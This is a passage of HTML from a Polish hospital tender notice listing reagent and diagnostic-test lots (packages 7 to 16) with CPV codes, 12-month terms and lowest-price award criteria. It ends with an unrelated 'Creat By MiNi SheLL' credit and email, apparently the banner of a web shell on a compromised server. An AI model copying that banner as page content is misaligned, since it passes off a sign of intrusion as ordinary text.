<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.61.00-6, 33.69.62.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PAKIET Nr 7- Odczynnik do badania do badania w kierunku kiły.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Odczynnik do badania do badania w kierunku kiły do Pracowni Serologicznej - Banku Krwi.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.61.00-6, 33.69.62.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PAKIET Nr 8  - Odczynniki do serologii grup krwi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Odczynniki do serologii grup krwi dla potrzeb Pracowni Serologicznej - Banku Krwi.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.61.00-6, 33.69.62.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> PAKIET Nr 9 - Odczynniki do koagulologii na aparat KSELMED 3002 OPTIC - ozn. Wykonywane met.mikro w dubletach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Odczynniki do koagulologii na aparat KSELMED 3002 OPTIC - ozn. Wykonywane met.mikro w dubletach dla potrzeb Labolatorium Analitycznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.69.63.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> PAKIET Nr 10 - Odczynniki do analityki ogólnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Odczynniki do analityki ogólnej dla potrzeb Labolatorium Analitycznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.69.63.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> PAKIET Nr 11 - Odczynniki  do analizatora hematologicznego SWELAB AC 900 i odczynnik  do rozmazów krwi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Odczynniki  do analizatora hematologicznego SWELAB AC 900 i odczynnik  do rozmazów krwi dla potrzeb Laboratorium Analitycznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.69.63.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> PAKIET Nr 12 - Odczynniki gotowe- Chemia kliniczna- aparat STAT-FAX 1904.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Odczynniki gotowe- Chemia kliniczna- aparat STAT-FAX 1904 dla potrzeb Laboratorium Analitycznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.69.63.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> PAKIET Nr 13 - Testy latexsowe, kasetkowe i paskowe do met.jakościowych i półilościowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Testy latexsowe, kasetkowe i paskowe do met.jakościowych i półilościowych dla potrzeb Laboratorium Analitycznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.69.63.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> PAKIET Nr 14 - Odczynniki i podłoża.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Odczynniki i podłoża dla potrzeb Bakteriologii.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.69.63.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> PAKIET Nr 15 -  Testy do wykrywania mikroorganizmów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Testy do wykrywania mikroorganizmów dla potrzeb Pracowni Bakteriologicznej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.69.63.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> PAKIET Nr 16 -  Krążki diagnostyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Krążki diagnostyczne  dla potrzeb Pracowni Bakteriologicznej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.69.63.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com